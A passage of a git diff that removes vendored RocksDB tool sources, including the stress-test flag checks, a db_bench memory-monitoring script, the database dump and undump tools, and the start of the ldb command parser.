-  FLAGS_env->SetBackgroundThreads(FLAGS_num_bottom_pri_threads,
-                                  rocksdb::Env::Priority::BOTTOM);
-  if (FLAGS_prefixpercent > 0 && FLAGS_prefix_size <= 0) {
-    fprintf(stderr,
-            "Error: prefixpercent is non-zero while prefix_size is "
-            "not positive!\n");
-    exit(1);
-  }
-  if (FLAGS_test_batches_snapshots && FLAGS_prefix_size <= 0) {
-    fprintf(stderr,
-            "Error: please specify prefix_size for "
-            "test_batches_snapshots test!\n");
-    exit(1);
-  }
-  if (FLAGS_memtable_prefix_bloom_size_ratio > 0.0 && FLAGS_prefix_size <= 0) {
-    fprintf(stderr,
-            "Error: please specify positive prefix_size in order to use "
-            "memtable_prefix_bloom_size_ratio\n");
-    exit(1);
-  }
-  if ((FLAGS_readpercent + FLAGS_prefixpercent +
-       FLAGS_writepercent + FLAGS_delpercent + FLAGS_delrangepercent +
-       FLAGS_iterpercent) != 100) {
-      fprintf(stderr,
-              "Error: Read+Prefix+Write+Delete+DeleteRange+Iterate percents != "
-              "100!\n");
-      exit(1);
-  }
-  if (FLAGS_disable_wal == 1 && FLAGS_reopen > 0) {
-      fprintf(stderr, "Error: Db cannot reopen safely with disable_wal set!\n");
-      exit(1);
-  }
-  if ((unsigned)FLAGS_reopen >= FLAGS_ops_per_thread) {
-      fprintf(stderr,
-              "Error: #DB-reopens should be < ops_per_thread\n"
-              "Provided reopens = %d and ops_per_thread = %lu\n",
-              FLAGS_reopen,
-              (unsigned long)FLAGS_ops_per_thread);
-      exit(1);
-  }
-  if (FLAGS_test_batches_snapshots && FLAGS_delrangepercent > 0) {
-    fprintf(stderr, "Error: nonzero delrangepercent unsupported in "
-                    "test_batches_snapshots mode\n");
-    exit(1);
-  }
-  if (FLAGS_active_width > FLAGS_max_key) {
-    fprintf(stderr, "Error: active_width can be at most max_key\n");
-    exit(1);
-  } else if (FLAGS_active_width == 0) {
-    FLAGS_active_width = FLAGS_max_key;
-  }
-  if (FLAGS_value_size_mult * kRandomValueMaxFactor > kValueMaxLen) {
-    fprintf(stderr, "Error: value_size_mult can be at most %d\n",
-            kValueMaxLen / kRandomValueMaxFactor);
-    exit(1);
-  }
-
-  // Choose a location for the test database if none given with --db=<path>
-  if (FLAGS_db.empty()) {
-      std::string default_db_path;
-      rocksdb::Env::Default()->GetTestDirectory(&default_db_path);
-      default_db_path += "/dbstress";
-      FLAGS_db = default_db_path;
-  }
-
-  rocksdb_kill_odds = FLAGS_kill_random_test;
-  rocksdb_kill_prefix_blacklist = SplitString(FLAGS_kill_prefix_blacklist);
-
-  rocksdb::StressTest stress;
-  if (stress.Run()) {
-    return 0;
-  } else {
-    return 1;
-  }
-}
-
-#endif  // GFLAGS
diff --git a/thirdparty/rocksdb/tools/dbench_monitor b/thirdparty/rocksdb/tools/dbench_monitor
deleted file mode 100755
index d85f9d0..0000000
--- a/thirdparty/rocksdb/tools/dbench_monitor
+++ /dev/null
@@ -1,102 +0,0 @@
-#!/usr/bin/env bash
-#
-#(c) 2004-present, Facebook Inc. All rights reserved.
-#
-#see LICENSE file for more information on use/redistribution rights.
-#
-
-#
-#dbench_monitor: monitor db_bench process for violation of memory utilization
-#
-#default usage will monitor 'virtual memory size'. See below for standard options
-#passed to db_bench during this test.
-#
-# See also: ./pflag for the actual monitoring script that does the work
-#
-#NOTE:
-#  You may end up with some /tmp/ files if db_bench OR
-#  this script OR ./pflag was killed unceremoniously
-#
-#  If you see the script taking a long time, trying "kill"
-#  will usually cleanly exit.
-#
-#
-DIR=`dirname $0`
-LOG=/tmp/`basename $0`.$$
-DB_BENCH="$DIR/../db_bench";
-PFLAG=${DIR}/pflag
-
-usage() {
-    cat <<HELP; exit
-
-Usage: $0  [-h]
-
--h: prints this help message
-
-This program will run the db_bench script to monitor memory usage
-using the 'pflag' program. It launches db_bench with default settings
-for certain arguments. You can change the defaults passed to
-'db_bench' program, by setting the following environment 
-variables:
-
-  bs [block_size]
-  ztype [compression_type]
-  benches [benchmarks]
-  reads [reads]
-  threads [threads]
-  cs [cache_size]
-  vsize [value_size]
-  comp [compression_ratio]
-  num [num]
-
-See the code for more info
-
-HELP
-
-}
-
-[ ! -x ${DB_BENCH} ] && echo "WARNING: ${DB_BENCH} doesn't exist, abort!" && exit -1;
-
-[ "x$1" = "x-h" ] && usage;
-
-trap 'rm -f ${LOG}; kill ${PID}; echo "Interrupted, exiting";' 1 2 3 15
-
-touch $LOG;
-
-: ${bs:=16384}
-: ${ztype:=zlib}
-: ${benches:=readwhilewriting}
-: ${reads:=$((1*1024*1024))};
-: ${threads:=8}
-: ${vsize:=2000}
-: ${comp:=0.5}
-: ${num:=10000}
-: ${cs:=$((1*1024*1024*1024))};
-
-DEBUG=1    #Set to 0 to remove chattiness 
-
-
-if [ "x$DEBUG" != "x" ]; then
-  #
-  #NOTE: under some circumstances, --use_existing_db may leave LOCK files under ${TMPDIR}/rocksdb/*
-  #cleanup the dir and re-run
-  #
-  echo DEBUG: Will run $DB_BENCH --block_size=$bs --compression_type=$ztype --benchmarks="$benches" --reads="$reads" --threads="$threads" --cache_size=$cs  --value_size=$vsize --compression_ratio=$comp --num=$num --use_existing_db 
-
-fi
-
-$DB_BENCH --block_size=$bs --compression_type=$ztype --benchmarks="$benches" --reads="$reads" --threads="$threads" --cache_size=$cs  --value_size=$vsize --compression_ratio=$comp --num=$num --use_existing_db >$LOG 2>&1 &
-
-if [ $? -ne 0 ]; then
-  warn "WARNING: ${DB_BENCH} did not launch successfully! Abort!";
-  exit;
-fi
-PID=$!
-
-#
-#Start the monitoring. Default is "vsz" monitoring for upto cache_size ($cs) value of virtual mem
-#You could also monitor RSS and CPUTIME (bsdtime). Try 'pflag -h' for how to do this
-#
-${PFLAG} -p $PID -v
-
-rm -f $LOG;
diff --git a/thirdparty/rocksdb/tools/dump/db_dump_tool.cc b/thirdparty/rocksdb/tools/dump/db_dump_tool.cc
deleted file mode 100644
index 8c5fa82..0000000
--- a/thirdparty/rocksdb/tools/dump/db_dump_tool.cc
+++ /dev/null
@@ -1,261 +0,0 @@
-//  Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-
-#ifndef ROCKSDB_LITE
-
-#ifndef __STDC_FORMAT_MACROS
-#define __STDC_FORMAT_MACROS
-#endif
-
-#include <inttypes.h>
-#include <iostream>
-
-#include "rocksdb/db.h"
-#include "rocksdb/db_dump_tool.h"
-#include "rocksdb/env.h"
-#include "util/coding.h"
-
-namespace rocksdb {
-
-bool DbDumpTool::Run(const DumpOptions& dump_options,
-                     rocksdb::Options options) {
-  rocksdb::DB* dbptr;
-  rocksdb::Status status;
-  std::unique_ptr<rocksdb::WritableFile> dumpfile;
-  char hostname[1024];
-  int64_t timesec = 0;
-  std::string abspath;
-  char json[4096];
-
-  static const char* magicstr = "ROCKDUMP";
-  static const char versionstr[8] = {0, 0, 0, 0, 0, 0, 0, 1};
-
-  rocksdb::Env* env = rocksdb::Env::Default();
-
-  // Open the database
-  options.create_if_missing = false;
-  status = rocksdb::DB::OpenForReadOnly(options, dump_options.db_path, &dbptr);
-  if (!status.ok()) {
-    std::cerr << "Unable to open database '" << dump_options.db_path
-              << "' for reading: " << status.ToString() << std::endl;
-    return false;
-  }
-
-  const std::unique_ptr<rocksdb::DB> db(dbptr);
-
-  status = env->NewWritableFile(dump_options.dump_location, &dumpfile,
-                                rocksdb::EnvOptions());
-  if (!status.ok()) {
-    std::cerr << "Unable to open dump file '" << dump_options.dump_location
-              << "' for writing: " << status.ToString() << std::endl;
-    return false;
-  }
-
-  rocksdb::Slice magicslice(magicstr, 8);
-  status = dumpfile->Append(magicslice);
-  if (!status.ok()) {
-    std::cerr << "Append failed: " << status.ToString() << std::endl;
-    return false;
-  }
-
-  rocksdb::Slice versionslice(versionstr, 8);
-  status = dumpfile->Append(versionslice);
-  if (!status.ok()) {
-    std::cerr << "Append failed: " << status.ToString() << std::endl;
-    return false;
-  }
-
-  if (dump_options.anonymous) {
-    snprintf(json, sizeof(json), "{}");
-  } else {
-    status = env->GetHostName(hostname, sizeof(hostname));
-    status = env->GetCurrentTime(&timesec);
-    status = env->GetAbsolutePath(dump_options.db_path, &abspath);
-    snprintf(json, sizeof(json),
-             "{ \"database-path\": \"%s\", \"hostname\": \"%s\", "
-             "\"creation-time\": %" PRIi64 " }",
-             abspath.c_str(), hostname, timesec);
-  }
-
-  rocksdb::Slice infoslice(json, strlen(json));
-  char infosize[4];
-  rocksdb::EncodeFixed32(infosize, (uint32_t)infoslice.size());
-  rocksdb::Slice infosizeslice(infosize, 4);
-  status = dumpfile->Append(infosizeslice);
-  if (!status.ok()) {
-    std::cerr << "Append failed: " << status.ToString() << std::endl;
-    return false;
-  }
-  status = dumpfile->Append(infoslice);
-  if (!status.ok()) {
-    std::cerr << "Append failed: " << status.ToString() << std::endl;
-    return false;
-  }
-
-  const std::unique_ptr<rocksdb::Iterator> it(
-      db->NewIterator(rocksdb::ReadOptions()));
-  for (it->SeekToFirst(); it->Valid(); it->Next()) {
-    char keysize[4];
-    rocksdb::EncodeFixed32(keysize, (uint32_t)it->key().size());
-    rocksdb::Slice keysizeslice(keysize, 4);
-    status = dumpfile->Append(keysizeslice);
-    if (!status.ok()) {
-      std::cerr << "Append failed: " << status.ToString() << std::endl;
-      return false;
-    }
-    status = dumpfile->Append(it->key());
-    if (!status.ok()) {
-      std::cerr << "Append failed: " << status.ToString() << std::endl;
-      return false;
-    }
-
-    char valsize[4];
-    rocksdb::EncodeFixed32(valsize, (uint32_t)it->value().size());
-    rocksdb::Slice valsizeslice(valsize, 4);
-    status = dumpfile->Append(valsizeslice);
-    if (!status.ok()) {
-      std::cerr << "Append failed: " << status.ToString() << std::endl;
-      return false;
-    }
-    status = dumpfile->Append(it->value());
-    if (!status.ok()) {
-      std::cerr << "Append failed: " << status.ToString() << std::endl;
-      return false;
-    }
-  }
-  if (!it->status().ok()) {
-    std::cerr << "Database iteration failed: " << status.ToString()
-              << std::endl;
-    return false;
-  }
-  return true;
-}
-
-bool DbUndumpTool::Run(const UndumpOptions& undump_options,
-                       rocksdb::Options options) {
-  rocksdb::DB* dbptr;
-  rocksdb::Status status;
-  rocksdb::Env* env;
-  std::unique_ptr<rocksdb::SequentialFile> dumpfile;
-  rocksdb::Slice slice;
-  char scratch8[8];
-
-  static const char* magicstr = "ROCKDUMP";
-  static const char versionstr[8] = {0, 0, 0, 0, 0, 0, 0, 1};
-
-  env = rocksdb::Env::Default();
-
-  status = env->NewSequentialFile(undump_options.dump_location, &dumpfile,
-                                  rocksdb::EnvOptions());
-  if (!status.ok()) {
-    std::cerr << "Unable to open dump file '" << undump_options.dump_location
-              << "' for reading: " << status.ToString() << std::endl;
-    return false;
-  }
-
-  status = dumpfile->Read(8, &slice, scratch8);
-  if (!status.ok() || slice.size() != 8 ||
-      memcmp(slice.data(), magicstr, 8) != 0) {
-    std::cerr << "File '" << undump_options.dump_location
-              << "' is not a recognizable dump file." << std::endl;
-    return false;
-  }
-
-  status = dumpfile->Read(8, &slice, scratch8);
-  if (!status.ok() || slice.size() != 8 ||
-      memcmp(slice.data(), versionstr, 8) != 0) {
-    std::cerr << "File '" << undump_options.dump_location
-              << "' version not recognized." << std::endl;
-    return false;
-  }
-
-  status = dumpfile->Read(4, &slice, scratch8);
-  if (!status.ok() || slice.size() != 4) {
-    std::cerr << "Unable to read info blob size." << std::endl;
-    return false;
-  }
-  uint32_t infosize = rocksdb::DecodeFixed32(slice.data());
-  status = dumpfile->Skip(infosize);
-  if (!status.ok()) {
-    std::cerr << "Unable to skip info blob: " << status.ToString() << std::endl;
-    return false;
-  }
-
-  options.create_if_missing = true;
-  status = rocksdb::DB::Open(options, undump_options.db_path, &dbptr);
-  if (!status.ok()) {
-    std::cerr << "Unable to open database '" << undump_options.db_path
-              << "' for writing: " << status.ToString() << std::endl;
-    return false;
-  }
-
-  const std::unique_ptr<rocksdb::DB> db(dbptr);
-
-  uint32_t last_keysize = 64;
-  size_t last_valsize = 1 << 20;
-  std::unique_ptr<char[]> keyscratch(new char[last_keysize]);
-  std::unique_ptr<char[]> valscratch(new char[last_valsize]);
-
-  while (1) {
-    uint32_t keysize, valsize;
-    rocksdb::Slice keyslice;
-    rocksdb::Slice valslice;
-
-    status = dumpfile->Read(4, &slice, scratch8);
-    if (!status.ok() || slice.size() != 4) break;
-    keysize = rocksdb::DecodeFixed32(slice.data());
-    if (keysize > last_keysize) {
-      while (keysize > last_keysize) last_keysize *= 2;
-      keyscratch = std::unique_ptr<char[]>(new char[last_keysize]);
-    }
-
-    status = dumpfile->Read(keysize, &keyslice, keyscratch.get());
-    if (!status.ok() || keyslice.size() != keysize) {
-      std::cerr << "Key read failure: "
-                << (status.ok() ? "insufficient data" : status.ToString())
-                << std::endl;
-      return false;
-    }
-
-    status = dumpfile->Read(4, &slice, scratch8);
-    if (!status.ok() || slice.size() != 4) {
-      std::cerr << "Unable to read value size: "
-                << (status.ok() ? "insufficient data" : status.ToString())
-                << std::endl;
-      return false;
-    }
-    valsize = rocksdb::DecodeFixed32(slice.data());
-    if (valsize > last_valsize) {
-      while (valsize > last_valsize) last_valsize *= 2;
-      valscratch = std::unique_ptr<char[]>(new char[last_valsize]);
-    }
-
-    status = dumpfile->Read(valsize, &valslice, valscratch.get());
-    if (!status.ok() || valslice.size() != valsize) {
-      std::cerr << "Unable to read value: "
-                << (status.ok() ? "insufficient data" : status.ToString())
-                << std::endl;
-      return false;
-    }
-
-    status = db->Put(rocksdb::WriteOptions(), keyslice, valslice);
-    if (!status.ok()) {
-      fprintf(stderr, "Unable to write database entry\n");
-      return false;
-    }
-  }
-
-  if (undump_options.compact_db) {
-    status = db->CompactRange(rocksdb::CompactRangeOptions(), nullptr, nullptr);
-    if (!status.ok()) {
-      fprintf(stderr,
-              "Unable to compact the database after loading the dumped file\n");
-      return false;
-    }
-  }
-  return true;
-}
-}  // namespace rocksdb
-#endif  // ROCKSDB_LITE
diff --git a/thirdparty/rocksdb/tools/dump/rocksdb_dump.cc b/thirdparty/rocksdb/tools/dump/rocksdb_dump.cc
deleted file mode 100644
index ddbfc2f..0000000
--- a/thirdparty/rocksdb/tools/dump/rocksdb_dump.cc
+++ /dev/null
@@ -1,63 +0,0 @@
-//  Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-
-#if !(defined GFLAGS) || defined(ROCKSDB_LITE)
-
-#include <cstdio>
-int main() {
-#ifndef GFLAGS
-  fprintf(stderr, "Please install gflags to run rocksdb tools\n");
-#endif
-#ifdef ROCKSDB_LITE
-  fprintf(stderr, "DbDumpTool is not supported in ROCKSDB_LITE\n");
-#endif
-  return 1;
-}
-
-#else
-
-#include <gflags/gflags.h>
-#include "rocksdb/convenience.h"
-#include "rocksdb/db_dump_tool.h"
-
-DEFINE_string(db_path, "", "Path to the db that will be dumped");
-DEFINE_string(dump_location, "", "Path to where the dump file location");
-DEFINE_bool(anonymous, false,
-            "Remove information like db path, creation time from dumped file");
-DEFINE_string(db_options, "",
-              "Options string used to open the database that will be dumped");
-
-int main(int argc, char** argv) {
-  GFLAGS::ParseCommandLineFlags(&argc, &argv, true);
-
-  if (FLAGS_db_path == "" || FLAGS_dump_location == "") {
-    fprintf(stderr, "Please set --db_path and --dump_location\n");
-    return 1;
-  }
-
-  rocksdb::DumpOptions dump_options;
-  dump_options.db_path = FLAGS_db_path;
-  dump_options.dump_location = FLAGS_dump_location;
-  dump_options.anonymous = FLAGS_anonymous;
-
-  rocksdb::Options db_options;
-  if (FLAGS_db_options != "") {
-    rocksdb::Options parsed_options;
-    rocksdb::Status s = rocksdb::GetOptionsFromString(
-        db_options, FLAGS_db_options, &parsed_options);
-    if (!s.ok()) {
-      fprintf(stderr, "Cannot parse provided db_options\n");
-      return 1;
-    }
-    db_options = parsed_options;
-  }
-
-  rocksdb::DbDumpTool tool;
-  if (!tool.Run(dump_options, db_options)) {
-    return 1;
-  }
-  return 0;
-}
-#endif  // !(defined GFLAGS) || defined(ROCKSDB_LITE)
diff --git a/thirdparty/rocksdb/tools/dump/rocksdb_undump.cc b/thirdparty/rocksdb/tools/dump/rocksdb_undump.cc
deleted file mode 100644
index 0d04cca..0000000
--- a/thirdparty/rocksdb/tools/dump/rocksdb_undump.cc
+++ /dev/null
@@ -1,62 +0,0 @@
-//  Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-
-#if !(defined GFLAGS) || defined(ROCKSDB_LITE)
-
-#include <cstdio>
-int main() {
-#ifndef GFLAGS
-  fprintf(stderr, "Please install gflags to run rocksdb tools\n");
-#endif
-#ifdef ROCKSDB_LITE
-  fprintf(stderr, "DbUndumpTool is not supported in ROCKSDB_LITE\n");
-#endif
-  return 1;
-}
-
-#else
-
-#include <gflags/gflags.h>
-#include "rocksdb/convenience.h"
-#include "rocksdb/db_dump_tool.h"
-
-DEFINE_string(dump_location, "", "Path to the dump file that will be loaded");
-DEFINE_string(db_path, "", "Path to the db that we will undump the file into");
-DEFINE_bool(compact, false, "Compact the db after loading the dumped file");
-DEFINE_string(db_options, "",
-              "Options string used to open the database that will be loaded");
-
-int main(int argc, char **argv) {
-  GFLAGS::ParseCommandLineFlags(&argc, &argv, true);
-
-  if (FLAGS_db_path == "" || FLAGS_dump_location == "") {
-    fprintf(stderr, "Please set --db_path and --dump_location\n");
-    return 1;
-  }
-
-  rocksdb::UndumpOptions undump_options;
-  undump_options.db_path = FLAGS_db_path;
-  undump_options.dump_location = FLAGS_dump_location;
-  undump_options.compact_db = FLAGS_compact;
-
-  rocksdb::Options db_options;
-  if (FLAGS_db_options != "") {
-    rocksdb::Options parsed_options;
-    rocksdb::Status s = rocksdb::GetOptionsFromString(
-        db_options, FLAGS_db_options, &parsed_options);
-    if (!s.ok()) {
-      fprintf(stderr, "Cannot parse provided db_options\n");
-      return 1;
-    }
-    db_options = parsed_options;
-  }
-
-  rocksdb::DbUndumpTool tool;
-  if (!tool.Run(undump_options, db_options)) {
-    return 1;
-  }
-  return 0;
-}
-#endif  // !(defined GFLAGS) || defined(ROCKSDB_LITE)
diff --git a/thirdparty/rocksdb/tools/generate_random_db.sh b/thirdparty/rocksdb/tools/generate_random_db.sh
deleted file mode 100755
index e10843b..0000000
--- a/thirdparty/rocksdb/tools/generate_random_db.sh
+++ /dev/null
@@ -1,30 +0,0 @@
-#!/usr/bin/env bash
-#
-# A shell script to load some pre generated data file to a DB using ldb tool
-# ./ldb needs to be avaible to be executed.
-#
-# Usage: <SCRIPT> <input_data_path> <DB Path>
-
-if [ "$#" -lt 2 ]; then
-  echo "usage: $BASH_SOURCE <input_data_path> <DB Path>"
-  exit 1
-fi
-
-input_data_dir=$1
-db_dir=$2
-rm -rf $db_dir
-
-echo == Loading data from $input_data_dir to $db_dir
-
-declare -a compression_opts=("no" "snappy" "zlib" "bzip2")
-
-set -e
-
-n=0
-
-for f in `ls -1 $input_data_dir`
-do
-  echo == Loading $f with compression ${compression_opts[n % 4]}
-  ./ldb load --db=$db_dir --compression_type=${compression_opts[n % 4]} --bloom_bits=10 --auto_compaction=false --create_if_missing < $input_data_dir/$f
-  let "n = n + 1"
-done
diff --git a/thirdparty/rocksdb/tools/ldb.cc b/thirdparty/rocksdb/tools/ldb.cc
deleted file mode 100644
index 6f70de6..0000000
--- a/thirdparty/rocksdb/tools/ldb.cc
+++ /dev/null
@@ -1,21 +0,0 @@
-//  Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-//
-#ifndef ROCKSDB_LITE
-
-#include "rocksdb/ldb_tool.h"
-
-int main(int argc, char** argv) {
-  rocksdb::LDBTool tool;
-  tool.Run(argc, argv);
-  return 0;
-}
-#else
-#include <stdio.h>
-int main(int argc, char** argv) {
-  fprintf(stderr, "Not supported in lite mode.\n");
-  return 1;
-}
-#endif  // ROCKSDB_LITE
diff --git a/thirdparty/rocksdb/tools/ldb_cmd.cc b/thirdparty/rocksdb/tools/ldb_cmd.cc
deleted file mode 100644
index c8b6221..0000000
--- a/thirdparty/rocksdb/tools/ldb_cmd.cc
+++ /dev/null
@@ -1,2898 +0,0 @@
-//  Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-//
-#ifndef ROCKSDB_LITE
-#include "rocksdb/utilities/ldb_cmd.h"
-
-#ifndef __STDC_FORMAT_MACROS
-#define __STDC_FORMAT_MACROS
-#endif
-
-#include <inttypes.h>
-
-#include "db/db_impl.h"
-#include "db/dbformat.h"
-#include "db/log_reader.h"
-#include "db/write_batch_internal.h"
-#include "port/dirent.h"
-#include "rocksdb/cache.h"
-#include "rocksdb/table_properties.h"
-#include "rocksdb/utilities/backupable_db.h"
-#include "rocksdb/utilities/checkpoint.h"
-#include "rocksdb/utilities/debug.h"
-#include "rocksdb/utilities/object_registry.h"
-#include "rocksdb/utilities/options_util.h"
-#include "rocksdb/write_batch.h"
-#include "rocksdb/write_buffer_manager.h"
-#include "table/scoped_arena_iterator.h"
-#include "tools/ldb_cmd_impl.h"
-#include "tools/sst_dump_tool_imp.h"
-#include "util/cast_util.h"
-#include "util/coding.h"
-#include "util/filename.h"
-#include "util/stderr_logger.h"
-#include "util/string_util.h"
-#include "utilities/ttl/db_ttl_impl.h"
-
-#include <cstdlib>
-#include <ctime>
-#include <fstream>
-#include <functional>
-#include <iostream>
-#include <limits>
-#include <sstream>
-#include <stdexcept>
-#include <string>
-
-namespace rocksdb {
-
-const std::string LDBCommand::ARG_DB = "db";
-const std::string LDBCommand::ARG_PATH = "path";
-const std::string LDBCommand::ARG_HEX = "hex";
-const std::string LDBCommand::ARG_KEY_HEX = "key_hex";
-const std::string LDBCommand::ARG_VALUE_HEX = "value_hex";
-const std::string LDBCommand::ARG_CF_NAME = "column_family";
-const std::string LDBCommand::ARG_TTL = "ttl";
-const std::string LDBCommand::ARG_TTL_START = "start_time";
-const std::string LDBCommand::ARG_TTL_END = "end_time";
-const std::string LDBCommand::ARG_TIMESTAMP = "timestamp";
-const std::string LDBCommand::ARG_TRY_LOAD_OPTIONS = "try_load_options";
-const std::string LDBCommand::ARG_IGNORE_UNKNOWN_OPTIONS =
-    "ignore_unknown_options";
-const std::string LDBCommand::ARG_FROM = "from";
-const std::string LDBCommand::ARG_TO = "to";
-const std::string LDBCommand::ARG_MAX_KEYS = "max_keys";
-const std::string LDBCommand::ARG_BLOOM_BITS = "bloom_bits";
-const std::string LDBCommand::ARG_FIX_PREFIX_LEN = "fix_prefix_len";
-const std::string LDBCommand::ARG_COMPRESSION_TYPE = "compression_type";
-const std::string LDBCommand::ARG_COMPRESSION_MAX_DICT_BYTES =
-    "compression_max_dict_bytes";
-const std::string LDBCommand::ARG_BLOCK_SIZE = "block_size";
-const std::string LDBCommand::ARG_AUTO_COMPACTION = "auto_compaction";
-const std::string LDBCommand::ARG_DB_WRITE_BUFFER_SIZE = "db_write_buffer_size";
-const std::string LDBCommand::ARG_WRITE_BUFFER_SIZE = "write_buffer_size";
-const std::string LDBCommand::ARG_FILE_SIZE = "file_size";
-const std::string LDBCommand::ARG_CREATE_IF_MISSING = "create_if_missing";
-const std::string LDBCommand::ARG_NO_VALUE = "no_value";
-
-const char* LDBCommand::DELIM = " ==> ";
-
-namespace {
-
-void DumpWalFile(std::string wal_file, bool print_header, bool print_values,
-                 LDBCommandExecuteResult* exec_state);
-
-void DumpSstFile(std::string filename, bool output_hex, bool show_properties);
-};
-
-LDBCommand* LDBCommand::InitFromCmdLineArgs(
-    int argc, char** argv, const Options& options,
-    const LDBOptions& ldb_options,
-    const std::vector<ColumnFamilyDescriptor>* column_families) {
-  std::vector<std::string> args;
-  for (int i = 1; i < argc; i++) {
-    args.push_back(argv[i]);
-  }
-  return InitFromCmdLineArgs(args, options, ldb_options, column_families,
-                             SelectCommand);
-}
-
-/**
- * Parse the command-line arguments and create the appropriate LDBCommand2
- * instance.
- * The command line arguments must be in the following format:
- * ./ldb --db=PATH_TO_DB [--commonOpt1=commonOpt1Val] ..
- *        COMMAND <PARAM1> <PARAM2> ... [-cmdSpecificOpt1=cmdSpecificOpt1Val] ..
- * This is similar to the command line format used by HBaseClientTool.
- * Command name is not included in args.
- * Returns nullptr if the command-line cannot be parsed.
- */
-LDBCommand* LDBCommand::InitFromCmdLineArgs(
-    const std::vector<std::string>& args, const Options& options,
-    const LDBOptions& ldb_options,
-    const std::vector<ColumnFamilyDescriptor>* column_families,
-    const std::function<LDBCommand*(const ParsedParams&)>& selector) {
-  // --x=y command line arguments are added as x->y map entries in
-  // parsed_params.option_map.
-  //
-  // Command-line arguments of the form --hex end up in this array as hex to
-  // parsed_params.flags
-  ParsedParams parsed_params;
-
-  // Everything other than option_map and flags. Represents commands
-  // and their parameters.  For eg: put key1 value1 go into this vector.
-  std::vector<std::string> cmdTokens;
-
-  const std::string OPTION_PREFIX = "--";
-
-  for (const auto& arg : args) {
-    if (arg[0] == '-' && arg[1] == '-'){
-      std::vector<std::string> splits = StringSplit(arg, '=');
-      if (splits.size() == 2) {
-        std::string optionKey = splits[0].substr(OPTION_PREFIX.size());
-        parsed_params.option_map[optionKey] = splits[1];
-      } else {
-        std::string optionKey = splits[0].substr(OPTION_PREFIX.size());
-        parsed_params.flags.push_back(optionKey);
-      }
-    } else {
-      cmdTokens.push_back(arg);
-    }
-  }
-
-  if (cmdTokens.size() < 1) {
-    fprintf(stderr, "Command not specified!");
-    return nullptr;
-  }
-
-  parsed_params.cmd = cmdTokens[0];
-  parsed_params.cmd_params.assign(cmdTokens.begin() + 1, cmdTokens.end());
-
-  LDBCommand* command = selector(parsed_params);
-
-  if (command) {
-    command->SetDBOptions(options);
-    command->SetLDBOptions(ldb_options);
-  }
-  return command;
-}
-
-LDBCommand* LDBCommand::SelectCommand(const ParsedParams& parsed_params) {
-  if (parsed_params.cmd == GetCommand::Name()) {
-    return new GetCommand(parsed_params.cmd_params, parsed_params.option_map,
-                          parsed_params.flags);
-  } else if (parsed_params.cmd == PutCommand::Name()) {
-    return new PutCommand(parsed_params.cmd_params, parsed_params.option_map,
-                          parsed_params.flags);
-  } else if (parsed_params.cmd == BatchPutCommand::Name()) {
-    return new BatchPutCommand(parsed_params.cmd_params,
-                               parsed_params.option_map, parsed_params.flags);
-  } else if (parsed_params.cmd == ScanCommand::Name()) {
-    return new ScanCommand(parsed_params.cmd_params, parsed_params.option_map,
-                           parsed_params.flags);
-  } else if (parsed_params.cmd == DeleteCommand::Name()) {
-    return new DeleteCommand(parsed_params.cmd_params, parsed_params.option_map,
-                             parsed_params.flags);
-  } else if (parsed_params.cmd == DeleteRangeCommand::Name()) {
-    return new DeleteRangeCommand(parsed_params.cmd_params,
-                                  parsed_params.option_map,
-                                  parsed_params.flags);
-  } else if (parsed_params.cmd == ApproxSizeCommand::Name()) {
-    return new ApproxSizeCommand(parsed_params.cmd_params,
-                                 parsed_params.option_map, parsed_params.flags);
-  } else if (parsed_params.cmd == DBQuerierCommand::Name()) {
-    return new DBQuerierCommand(parsed_params.cmd_params,
-                                parsed_params.option_map, parsed_params.flags);
-  } else if (parsed_params.cmd == CompactorCommand::Name()) {
-    return new CompactorCommand(parsed_params.cmd_params,
-                                parsed_params.option_map, parsed_params.flags);
-  } else if (parsed_params.cmd == WALDumperCommand::Name()) {
-    return new WALDumperCommand(parsed_params.cmd_params,
-                                parsed_params.option_map, parsed_params.flags);
-  } else if (parsed_params.cmd == ReduceDBLevelsCommand::Name()) {
-    return new ReduceDBLevelsCommand(parsed_params.cmd_params,
-                                     parsed_params.option_map,
-                                     parsed_params.flags);
-  } else if (parsed_params.cmd == ChangeCompactionStyleCommand::Name()) {
-    return new ChangeCompactionStyleCommand(parsed_params.cmd_params,
-                                            parsed_params.option_map,
-                                            parsed_params.flags);
-  } else if (parsed_params.cmd == DBDumperCommand::Name()) {
-    return new DBDumperCommand(parsed_params.cmd_params,
-                               parsed_params.option_map, parsed_params.flags);
-  } else if (parsed_params.cmd == DBLoaderCommand::Name()) {
-    return new DBLoaderCommand(parsed_params.cmd_params,
-                               parsed_params.option_map, parsed_params.flags);
-  } else if (parsed_params.cmd == ManifestDumpCommand::Name()) {
-    return new ManifestDumpCommand(parsed_params.cmd_params,
-                                   parsed_params.option_map,
-                                   parsed_params.flags);
-  } else if (parsed_params.cmd == ListColumnFamiliesCommand::Name()) {
-    return new ListColumnFamiliesCommand(parsed_params.cmd_params,
-                                         parsed_params.option_map,
-                                         parsed_params.flags);
-  } else if (parsed_params.cmd == CreateColumnFamilyCommand::Name()) {
-    return new CreateColumnFamilyCommand(parsed_params.cmd_params,
-                                         parsed_params.option_map,
-                                         parsed_params.flags);
-  } else if (parsed_params.cmd == DBFileDumperCommand::Name()) {
-    return new DBFileDumperCommand(parsed_params.cmd_params,
-                                   parsed_params.option_map,
-                                   parsed_params.flags);
-  } else if (parsed_params.cmd == InternalDumpCommand::Name()) {
-    return new InternalDumpCommand(parsed_params.cmd_params,
-                                   parsed_params.option_map,
-                                   parsed_params.flags);
-  } else if (parsed_params.cmd == CheckConsistencyCommand::Name()) {
-    return new CheckConsistencyCommand(parsed_params.cmd_params,
